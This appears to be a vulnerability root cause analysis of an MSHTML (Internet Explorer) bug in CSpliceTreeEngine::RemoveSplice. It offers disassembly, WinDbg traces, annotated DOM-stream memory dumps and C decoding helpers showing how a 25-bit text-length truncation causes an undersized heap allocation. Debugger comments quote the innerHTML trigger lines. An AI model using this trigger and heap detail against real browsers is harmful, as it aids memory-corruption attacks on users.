    .text:63A46325 and     esp, 0FFFFFFF8h
    .text:63A46328 sub     esp, 240h
    .text:63A4632E mov     eax, ___security_cookie
    .text:63A46333 xor     eax, esp
    .text:63A46335 mov     [esp+240h+var_4], eax
;bp 63A46783: the first CTreePos::GetCp() call near the crash site
    .text:63A46783 mov     ecx, [esi+14h]                  ; this
    .text:63A46786 call    ?GetCp@CTreePos@@QAEJXZ         ; CTreePos::GetCp(void)
    .text:63A4678B mov     ecx, [esi+18h]                  ; this
    .text:63A4678E mov     edi, 1
    .text:63A46793 sub     edi, eax
    .text:63A46795 call    ?GetCp@CTreePos@@QAEJXZ         ; CTreePos::GetCp(void)
    .text:63A4679A mov     ecx, [esi+18h]                  ; this
    .text:63A4679D lea     edx, [edi+eax]

WinDbg output:

(1940.12fc): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffd`64a43150 cc              int     3                                             ; initial breakpoint
0:020> bp MSHTML!CSpliceTreeEngine::RemoveSplice
0:020> bp 63A46783
0:020> g
ModLoad: 00000000`73e10000 00000000`73e9e000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.864_none_58922fed78a9e6a7\COMCTL32.dll
ModLoad: 00000000`6f840000 00000000`6fa30000   C:\Windows\SysWOW64\uiautomationcore.dll
ModLoad: 00000000`70020000 00000000`70066000   C:\Windows\SysWOW64\Bcp47Langs.dll
ModLoad: 00000000`72e10000 00000000`72e2f000   C:\Windows\SysWOW64\WLDP.DLL
ModLoad: 00000000`771f0000 00000000`77235000   C:\Windows\SysWOW64\WINTRUST.dll
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff            mov     edi,edi                                                ; first break: b.innerHTML = Array(40370176).toString();
0:007:x86> g
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff            mov     edi,edi                                                ; second break: b.innerHTML = "";
0:007:x86> g
MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:
63a46783 8b4e14          mov     ecx,dword ptr [esi+14h] ds:002b:04f3ca1c=048a05ac
0:007:x86> r
eax=00000000 ebx=04f3cb38 ecx=04890a80 edx=00000000 esi=04f3ca08 edi=048a05ac
eip=63a46783 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:
63a46783 8b4e14          mov     ecx,dword ptr [esi+14h] ds:002b:04f3ca1c=048a05ac      ;ecx = 0x048a05ac,CTreePos *_ptpSourceL,<head>
0:007:x86> pr
eax=00000000 ebx=04f3cb38 ecx=048a05ac edx=00000000 esi=04f3ca08 edi=048a05ac
eip=63a46786 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x466:
63a46786 e8dc118900      call    MSHTML!CTreePos::GetCp (642d7967)                      ; eax = 0x00000002, the cp (position) of <head> in the DOM stream
0:007:x86> pr
eax=00000002 ebx=04f3cb38 ecx=00000000 edx=0483d534 esi=04f3ca08 edi=048a05ac
eip=63a4678b esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46b:
63a4678b 8b4e18          mov     ecx,dword ptr [esi+18h] ds:002b:04f3ca20=048a0624      ;ecx = 0x048a0624,CTreePos *_ptpSourceR,</body>
0:007:x86> pr
eax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=048a05ac
eip=63a4678e esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46e:
63a4678e bf01000000      mov     edi,1
0:007:x86> pr
eax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=00000001
eip=63a46793 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x473:
63a46793 2bf8            sub     edi,eax
0:007:x86> pr
eax=00000002 ebx=04f3cb38 ecx=048a0624 edx=0483d534 esi=04f3ca08 edi=ffffffff
eip=63a46795 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000297
MSHTML!CSpliceTreeEngine::RemoveSplice+0x475:
63a46795 e8cd118900      call    MSHTML!CTreePos::GetCp (642d7967)                      ; eax = 0x00680004, the cp (position) of </body> in the DOM stream
0:007:x86> pr
eax=00680004 ebx=04f3cb38 ecx=00000000 edx=048a0624 esi=04f3ca08 edi=ffffffff
eip=63a4679a esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47a:
63a4679a 8b4e18          mov     ecx,dword ptr [esi+18h] ds:002b:04f3ca20=048a0624      ;
0:007:x86> pr
eax=00680004 ebx=04f3cb38 ecx=048a0624 edx=048a0624 esi=04f3ca08 edi=ffffffff
eip=63a4679d esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47d:
63a4679d 8d1407          lea     edx,[edi+eax]                                          ;edx = edi+eax = 0x1-0x2+0x00680004 = 0x00680003
0:007:x86> pr
eax=00680004 ebx=04f3cb38 ecx=048a0624 edx=00680003 esi=04f3ca08 edi=ffffffff
eip=63a467a0 esp=04f3c7a8 ebp=04f3c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x480:
63a467a0 f60104          test    byte ptr [ecx],4           ds:002b:048a0624=72

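Starting from _ptpSourceL and _ptpSourceR, the two arguments passed to CTreePos::GetCp() near the crash, every element of the DOM stream can be recovered: follow the doubly linked list formed by CTreePos::_pLeft and _pRight, and use the fixed offsets of _tpBegin and _tpEnd from the start of each CTreeNode to get from a tag position back to its node.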
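The offsets this relies on can be read off the dumps that follow: every tag CTreeNode embeds its start-tag CTreePos at +0xC and its end-tag CTreePos at +0x24, and the low byte of the dword at +0x8 holds the ETAG_xxx value. A minimal C sketch of the pointer arithmetic, assuming those observed 32-bit offsets (the helper names are hypothetical, not mshtml symbols):

```c
#include <assert.h>
#include <stdint.h>

/* Offsets observed in the 32-bit dumps; not taken from symbols. */
enum {
    TREENODE_TAG_OFF     = 0x08, /* low byte of this dword holds ETAG_xxx */
    TREENODE_TPBEGIN_OFF = 0x0C, /* embedded CTreePos of the start tag    */
    TREENODE_TPEND_OFF   = 0x24  /* embedded CTreePos of the end tag      */
};

/* ETAG values identified in the dumps. */
enum { ETAG_BODY = 18, ETAG_HEAD = 54, ETAG_HTML = 58, ETAG_ROOT = 95 };

static uint32_t tp_begin_of(uint32_t node) { return node + TREENODE_TPBEGIN_OFF; }
static uint32_t tp_end_of(uint32_t node)   { return node + TREENODE_TPEND_OFF; }

/* Walks back from a tag CTreePos to its CTreeNode: NodeBeg (0x1) positions
   sit at +0xC, NodeEnd (0x2) positions at +0x24. */
static uint32_t node_of_tp(uint32_t tp, uint32_t elem_left_and_flags)
{
    return (elem_left_and_flags & 0x1u) ? tp - TREENODE_TPBEGIN_OFF
                                        : tp - TREENODE_TPEND_OFF;
}

/* Extracts the tag id from the dword read at node + TREENODE_TAG_OFF. */
static unsigned tag_of(uint32_t tag_dword) { return (unsigned)(tag_dword & 0xFFu); }
```

This is the same arithmetic as the "dd ecx-0xc" and "dd ecx-0x24" commands used in the root cause analysis.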

Below is the memory of the ROOT element's CTreeNode and of the CTreePos objects for its start and end tags:

CTreeNode
dd 048a0240
048a0240  04890a80 00000000 7002005f 00000051
048a0250  00000000 00000000 048a05ac 00000000
048a0260  048a02ac 00000062 00000000 00000000
048a0270  048a02c4 048a02c4 00000000 00010004
0x5f = 95,ETAG_ROOT = 95

<ROOT>
CTreePos * = 048a024c
dd 048a024c
048a024c  00000051 00000000 00000000 048a05ac
048a025c  00000000 048a02ac
_cElemLeftAndFlags = 00000051
     ElemLeft = 0x0
     Flags = 0x51 = 0101 0001,NodeBeg=0x1,TPF_LEFT_CHILD=0x10,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 048a05ac,<head>
_pLeft = 00000000
_pRight = 048a02ac,<html>

</ROOT>
CTreePos * = 048a0264
dd 048a0264
048a0264  00000062 00000000 00000000 048a02c4
048a0274  048a02c4 00000000
_cElemLeftAndFlags = 00000062
     ElemLeft = 0x0
     Flags = 0x62 = 0110 0010,NodeEnd=0x2,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 048a02c4,</html>
_pLeft = 048a02c4,</html>
_pRight = 00000000

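The _cElemLeftAndFlags decoding used in these annotations can be expressed as a small C helper. The bit names follow the annotations in this article; treating bit 0x40 as TPF_EDGE on tag positions and as TPF_DATA2_POS on data positions (those with 0x80 set), and taking ElemLeft as the value shifted right by 8, are inferences from the dumps rather than confirmed definitions.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

/* Low-byte flags of _cElemLeftAndFlags, as annotated in the dumps. */
#define TP_NODEBEG     0x01u
#define TP_NODEEND     0x02u
#define TP_TEXT        0x04u
#define TP_POINTER     0x08u
#define TPF_LEFT_CHILD 0x10u
#define TPF_LAST_CHILD 0x20u
#define TPF_BIT40      0x40u /* TPF_EDGE on tags, TPF_DATA2_POS on data positions (inferred) */
#define TPF_DATA_POS   0x80u

typedef enum { TPK_NODEBEG, TPK_NODEEND, TPK_TEXT, TPK_POINTER, TPK_UNKNOWN } tp_kind_t;

static const char *const tp_kind_names[] = { "NodeBeg", "NodeEnd", "Text", "Pointer", "Unknown" };

/* ElemLeft lives above the low byte (0x271 -> 0x2, 0x2f4 -> 0x2 in the dumps). */
static uint32_t tp_elem_left(uint32_t v) { return v >> 8; }
static uint32_t tp_flags(uint32_t v)     { return v & 0xFFu; }

static tp_kind_t tp_kind(uint32_t v)
{
    uint32_t f = tp_flags(v);
    if (f & TP_NODEBEG) return TPK_NODEBEG;
    if (f & TP_NODEEND) return TPK_NODEEND;
    if (f & TP_TEXT)    return TPK_TEXT;
    if (f & TP_POINTER) return TPK_POINTER;
    return TPK_UNKNOWN;
}

/* Prints one line in the spirit of the manual annotations in this article. */
static void tp_print(uint32_t v)
{
    uint32_t f = tp_flags(v);
    printf("ElemLeft=0x%x Flags=0x%02x %s%s%s%s%s\n",
           (unsigned)tp_elem_left(v), (unsigned)f, tp_kind_names[tp_kind(v)],
           (f & TPF_LEFT_CHILD) ? " TPF_LEFT_CHILD" : "",
           (f & TPF_LAST_CHILD) ? " TPF_LAST_CHILD" : "",
           (f & TPF_BIT40) ? ((f & TPF_DATA_POS) ? " TPF_DATA2_POS" : " TPF_EDGE") : "",
           (f & TPF_DATA_POS) ? " TPF_DATA_POS" : "");
}
```

For example, tp_print(0x2f4) yields the same decoding as the hand-written annotation of the Text CTreeDataPos further down.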
Below is the memory of the html element's CTreeNode and of the CTreePos objects for its start and end tags:

CTreeNode
dd 048a02a0
048a02a0  04890a40 048a0240 7022003a 00000271
048a02b0  00000001 048a024c 0483d534 048a024c
048a02c0  04896c00 00000262 00680002 04896c60
048a02d0  048a05ac 04896c60 048a0264 00030005
0x3a = 58,ETAG_HTML = 58

<html>
CTreePos * = 048a02ac
dd 048a02ac
048a02ac  00000271 00000001 048a024c 0483d534
048a02bc  048a024c 04896c00
_cElemLeftAndFlags = 00000271
     ElemLeft = 0x2
     Flags = 0x71 = 0111 0001,NodeBeg=0x1,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000001
_pFirstChild = 048a024c,<ROOT>
_pNext = 0483d534,
_pLeft = 048a024c,<ROOT>
_pRight = 04896c00,Pointer

</html>
CTreePos * = 048a02c4
dd 048a02c4
048a02c4  00000262 00680002 04896c60 048a05ac
048a02d4  04896c60 048a0264
_cElemLeftAndFlags = 00000262
     ElemLeft = 0x2
     Flags = 0x62 = 0110 0010,NodeEnd=0x2,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00680002
_pFirstChild = 04896c60,Pointer
_pNext = 048a05ac,<head>
_pLeft = 04896c60,Pointer
_pRight = 048a0264,</ROOT>

Below is the memory of the head element's CTreeNode and of the CTreePos objects for its start and end tags:

CTreeNode
dd 048a05a0
048a05a0  04890b80 048a02a0 70020036 00000061
048a05b0  00000000 04896c30 048a02ac 04896c30
048a05c0  048a05c4 00000052 00000000 048a060c
048a05d0  048a0624 048a05ac 048a060c ffffffff
0x36 = 54,ETAG_HEAD = 54

<head>
CTreePos *_ptpSourceL = 048a05ac
dd 048a05ac
048a05ac  00000061 00000000 04896c30 048a02ac
048a05bc  04896c30 048a05c4
_cElemLeftAndFlags = 00000061
     ElemLeft = 0x0
     Flags = 0x61 = 0110 0001,NodeBeg=0x1,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 04896c30,Pointer
_pNext = 048a02ac,<html>
_pLeft = 04896c30,Pointer
_pRight = 048a05c4,</head>

</head>
CTreePos * = 048a05c4
dd 048a05c4
048a05c4  00000052 00000000 048a060c 048a0624
048a05d4  048a05ac 048a060c
_cElemLeftAndFlags = 00000052
     ElemLeft = 0x0
     Flags = 0x52 = 0101 0010,NodeEnd=0x2,TPF_LEFT_CHILD=0x10,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 048a060c,<body>
_pNext = 048a0624,</body>
_pLeft = 048a05ac,<head>
_pRight = 048a060c,<body>

Below is the memory of the body element's CTreeNode and of the CTreePos objects for its start and end tags:

CTreeNode
dd 048a0600
048a0600  0489a3c0 048a02a0 70020012 00000061
048a0610  00000000 00000000 048a05c4 048a05c4
048a0620  04896ae0 00000062 00000000 00000000
048a0630  04896ae0 04896ae0 04896bd0 ffffffff
0x12 = 18,ETAG_BODY = 18

<body>
CTreePos * = 048a060c
dd 048a060c
048a060c  00000061 00000000 00000000 048a05c4
048a061c  048a05c4 04896ae0
_cElemLeftAndFlags = 00000061
     ElemLeft = 0x0
     Flags = 0x61 = 0110 0001,NodeBeg=0x1,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 048a05c4,</head>
_pLeft = 048a05c4,</head>
_pRight = 04896ae0,Text

</body>
CTreePos *_ptpSourceR = 048a0624
dd 048a0624
048a0624  00000062 00000000 00000000 04896ae0
048a0634  04896ae0 04896bd0
_cElemLeftAndFlags = 00000062
     ElemLeft = 0x0
     Flags = 0x62 = 0110 0010,NodeEnd=0x2,TPF_LAST_CHILD=0x20,TPF_EDGE=0x40
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 04896ae0,Text
_pLeft = 04896ae0,Text
_pRight = 04896bd0,Pointer

Besides the tag nodes, the DOM stream also links in CTreeDataPos (Text) and CTreeDataPos (Pointer) objects. Their memory is shown below:

Pointer
CTreeDataPos * = 04896c30
dd 04896c30
04896c30  00000098 00000000 04896c00 048a02c4
04896c40  04896c00 048a05ac 00000080 00000000
04896c50  00000000 00000000 00000000
_cElemLeftAndFlags = 00000098
     ElemLeft = 0x0
     Flags = 0x98 = 1001 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_DATA_POS=0x80
_cchLeft = 00000000
_pFirstChild = 04896c00,Pointer
_pNext = 048a02c4,</html>
_pLeft = 04896c00,Pointer
_pRight = 048a05ac,<head>
_ulRefs_Flags = 00000080
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 00000000

---------------------------------------------------------------------------------------------------------------

Pointer
CTreeDataPos * = 04896c60
dd 04896c60
04896c60  00000298 00680002 04896bd0 048a0264
04896c70  04896bd0 048a02c4 00000080 00000000
04896c80  00000000 00000001 00000000
_cElemLeftAndFlags = 00000298
     ElemLeft = 0x2
     Flags = 0x98 = 1001 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_DATA_POS=0x80
_cchLeft = 00680002
_pFirstChild = 04896bd0,Pointer
_pNext = 048a0264,</ROOT>
_pLeft = 04896bd0,Pointer
_pRight = 048a02c4,</html>
_ulRefs_Flags = 00000080
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 00000001

---------------------------------------------------------------------------------------------------------------

Text
CTreeDataPos * = 04896ae0
dd 04896ae0
04896ae0  000002f4 00000002 048a05c4 04896bd0
04896af0  048a060c 048a0624 00000041 00000000
04896b00  1cf14020 8267ffff 00000000
_cElemLeftAndFlags = 000002f4
     ElemLeft = 0x2
     Flags = 0xf4 = 1111 0100,Text=0x4,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_DATA2_POS=0x40,TPF_DATA_POS=0x80
_cchLeft = 00000002
_pFirstChild = 048a05c4,</head>
_pNext = 04896bd0,Pointer
_pLeft = 048a060c,<body>
_pRight = 048a0624,</body>
_ulRefs_Flags = 00000041
pSmartObject = 00000000
_pTextData = 1cf14020,Tree::TextData
_sid_cch = 8267ffff
     _cch = 0x8267ffff & 0x1ffffff = 0x67ffff
     _sid = 0x8267ffff >> 25 = 0x41 = 0100 0001
_lTextID = 00000000

!heap -x 1cf14020
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
000000001cf14018  000000001cf14020  0000000000730000  0000000000730000   4d01000         0       ffa  busy extra virtual

dd 1cf14020
1cf14020  00000002 0267ffff 002c002c 002c002c
1cf14030  002c002c 002c002c 002c002c 002c002c
1cf14040  002c002c 002c002c 002c002c 002c002c
1cf14050  002c002c 002c002c 002c002c 002c002c
1cf14060  002c002c 002c002c 002c002c 002c002c
1cf14070  002c002c 002c002c 002c002c 002c002c
1cf14080  002c002c 002c002c 002c002c 002c002c
1cf14090  002c002c 002c002c 002c002c 002c002c
...
dd 1cf14020+0x2680000*2-0x10
21c14010  002c002c 002c002c 002c002c 002c002c
21c14020  002c002c 0000002c 00000000 00000000
_ulRefs = 0x2
_cch = 0x0267ffff = 40370175
_TextData = 2c 00 2c 00 ...

0x21c14026 - 0x1cf14028 = 0x4CFFFFE
0x4CFFFFE/2 = 0x267FFFF = 40370175
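This is where the two lengths diverge: Tree::TextData stores the full count 0x0267ffff, but the _sid_cch field of the Text CTreeDataPos keeps only the low 25 bits, 0x67ffff. The C sketch below reproduces that decoding; the 25/7 bit split is inferred from the values in the dump, and the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define DATAPOS_CCH_BITS 25u
#define DATAPOS_CCH_MASK ((1u << DATAPOS_CCH_BITS) - 1u) /* 0x01ffffff */

/* Low 25 bits: character count of the text run. */
static uint32_t datapos_cch(uint32_t sid_cch) { return sid_cch & DATAPOS_CCH_MASK; }

/* High 7 bits: _sid. */
static uint32_t datapos_sid(uint32_t sid_cch) { return sid_cch >> DATAPOS_CCH_BITS; }

/* Packs sid and cch the way the dump suggests: bits of cch above bit 24
   are silently dropped, which is the truncation behind this bug. */
static uint32_t datapos_pack(uint32_t sid, uint32_t cch)
{
    return (sid << DATAPOS_CCH_BITS) | (cch & DATAPOS_CCH_MASK);
}
```

Any run longer than 0x1ffffff characters loses its high bits this way; 40370175 = 0x0267ffff needs 26 bits.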

---------------------------------------------------------------------------------------------------------------

Pointer
CTreeDataPos * = 04896c00
dd 04896c00
04896c00  000000b8 00000000 00000000 04896c30
04896c10  048a02ac 04896c30 00000040 00000000
04896c20  00000000 04f3ce28 00000000
_cElemLeftAndFlags = 000000b8
     ElemLeft = 0x0
     Flags = 0xb8 = 1011 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_DATA_POS=0x80
_cchLeft = 00000000
_pFirstChild = 00000000
_pNext = 04896c30,Pointer
_pLeft = 048a02ac,<html>
_pRight = 04896c30,Pointer
_ulRefs_Flags = 00000040
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 04f3ce28

---------------------------------------------------------------------------------------------------------------

Pointer
CTreeDataPos * = 04896bd0
dd 04896bd0
04896bd0  000002b8 00680002 04896ae0 04896c60
04896be0  048a0624 04896c60 00000040 00000000
04896bf0  00000000 04f3ce70 00000000
_cElemLeftAndFlags = 000002b8
     ElemLeft = 0x2
     Flags = 0xb8 = 1011 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_DATA_POS=0x80
_cchLeft = 00680002
_pFirstChild = 04896ae0,Text
_pNext = 04896c60,Pointer
_pLeft = 048a0624,</body>
_pRight = 04896c60,Pointer
_ulRefs_Flags = 00000040
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 04f3ce70

Using the _pFirstChild and _pNext members of CTreePos, the DOM tree of this PoC can be reconstructed as shown in the figure below:

Using the _pLeft and _pRight members of CTreePos, the DOM stream of this PoC can be reconstructed as shown in the figure below:
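Since the DOM stream is just a linked list, the cp values seen in the debugger can be reproduced with a flat array in _pRight order. In this sketch each position contributes a fixed number of characters: 1 per tag, 0 per pointer, and the truncated _cch (0x67ffff) for the text run. That counting rule is an assumption consistent with the GetCp() return values observed above (2 for <head>, 0x00680004 for </body>), and get_cp is a simplified stand-in for CTreePos::GetCp(), not its real implementation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One entry per CTreePos in the DOM stream, in _pRight order. */
typedef struct stream_pos {
    const char *name;
    uint32_t cch;     /* characters this position contributes (assumed rule) */
} stream_pos;

/* DOM stream recovered from the dumps; the text run carries the truncated
   25-bit length from its CTreeDataPos, not the real 0x0267ffff. */
static const stream_pos poc_stream[] = {
    {"<ROOT>", 1}, {"<html>", 1}, {"Pointer", 0}, {"Pointer", 0},
    {"<head>", 1}, {"</head>", 1}, {"<body>", 1}, {"Text", 0x0067ffffu},
    {"</body>", 1}, {"Pointer", 0}, {"Pointer", 0}, {"</html>", 1},
    {"</ROOT>", 1},
};

/* Simplified GetCp(): number of characters before position idx. */
static uint32_t get_cp(const stream_pos *s, size_t idx)
{
    uint32_t cp = 0;
    for (size_t i = 0; i < idx; i++)
        cp += s[i].cch;
    return cp;
}
```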

Root cause analysis

Key parts of the WinDbg output from dynamic debugging:

(638.e60): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffd`64a43150 cc              int     3
0:020> bp MSHTML!CSpliceTreeEngine::RemoveSplice
0:020> bp 63A46783  ; first CTreePos::GetCp() call before the crash
0:020> bp 63A467B5  ; allocation of the heap block that holds the removed content, operator new[]()
0:020> bp 63A468CF  ; Tree::TextData::GetText(), which returns the untruncated text length
0:020> g
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff            mov     edi,edi                                        ; first break: b.innerHTML = Array(40370176).toString();
0:008:x86> g
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff            mov     edi,edi                                        ; second break: b.innerHTML = "";
0:008:x86> g
Breakpoint 1 hit
MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:
63a46783 8b4e14          mov     ecx,dword ptr [esi+14h] ds:002b:0508ca1c=04aae54c
0:008:x86> p
eax=00000000 ebx=0508cb38 ecx=04aae54c edx=00000000 esi=0508ca08 edi=04aae54c
eip=63a46786 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x466:
63a46786 e8dc118900      call    MSHTML!CTreePos::GetCp (642d7967)              ; returns 0x2: <ROOT> and <html> count as one character each
0:008:x86> dd ecx-0xc l10   ; CTreeNode of _ptpSourceL (<head>); byte at 0x04aae548 = 0x36 = 54 = ETAG_HEAD
04aae540  04a82d40 04aae240 70020036 00000061
04aae550  00000000 04a84b40 04aae24c 04a84b40
04aae560  04aae564 00000052 00000000 04aae5ac
04aae570  04aae5c4 04aae54c 04aae5ac ffffffff
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=00000000 edx=04a3d534 esi=0508ca08 edi=04aae54c
eip=63a4678b esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46b:
63a4678b 8b4e18          mov     ecx,dword ptr [esi+18h] ds:002b:0508ca20=04aae5c4
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=04aae54c
eip=63a4678e esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46e:
63a4678e bf01000000      mov     edi,1
0:008:x86> dd ecx-0x24 l10  ; CTreeNode of _ptpSourceR (</body>); byte at 0x04aae5a8 = 0x12 = 18 = ETAG_BODY
04aae5a0  04a86320 04aae240 70020012 00000061
04aae5b0  00000000 00000000 04aae564 04aae564
04aae5c0  04a849f0 00000062 00000000 00000000
04aae5d0  04a849f0 04a849f0 04a84ae0 ffffffff
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=00000001
eip=63a46793 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x473:
63a46793 2bf8            sub     edi,eax                                        ; 1-2=-1
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=ffffffff
eip=63a46795 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000297
MSHTML!CSpliceTreeEngine::RemoveSplice+0x475:
63a46795 e8cd118900      call    MSHTML!CTreePos::GetCp (642d7967)              ; returns 0x00680004
; Array(40370176) yields 40370176-1 = 0x267ffff commas
; CTreeDataPos->DATAPOSTEXT->_cch is only 25 bits wide: 0x67ffff
; 0x00680004 = 0x67ffff + 0x5
; <ROOT>, <html>, <head>, </head> and <body> count as 1 character each
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=00000000 edx=04aae5c4 esi=0508ca08 edi=ffffffff
eip=63a4679a esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47a:
63a4679a 8b4e18          mov     ecx,dword ptr [esi+18h] ds:002b:0508ca20=04aae5c4
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=04aae5c4 edx=04aae5c4 esi=0508ca08 edi=ffffffff
eip=63a4679d esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47d:
63a4679d 8d1407          lea     edx,[edi+eax]                                  ; edx = 0x00680003
; range from _ptpSourceL (<head>) to _ptpSourceR (</body>)
; CTreeDataPos->DATAPOSTEXT->_cch (25 bits): 0x67ffff
; 0x00680003 = 0x67ffff + 0x4
; <head>, </head>, <body> and </body> count as 1 character each
......
0:008:x86> g
Breakpoint 2 hit
MSHTML!CSpliceTreeEngine::RemoveSplice+0x495:
63a467b5 8b442458        mov     eax,dword ptr [esp+58h] ss:002b:0508c800=00680004
0:008:x86> p
MSHTML!CSpliceTreeEngine::RemoveSplice+0x499:
63a467b9 3b442460        cmp     eax,dword ptr [esp+60h] ss:002b:0508c808=00680004
0:008:x86> p
MSHTML!CSpliceTreeEngine::RemoveSplice+0x49d:
63a467bd 0f8f36ac1400    jg      MSHTML!CSpliceTreeEngine::RemoveSplice+0x14b0d9 (63b913f9) [br=0]
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=04aae5c4 edx=00680003 esi=0508ca08 edi=ffffffff
eip=63a467c3 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4a3:
63a467c3 8d0c12          lea     ecx,[edx+edx]
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=00d00006 edx=00680003 esi=0508ca08 edi=ffffffff
eip=63a467c6 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4a6:
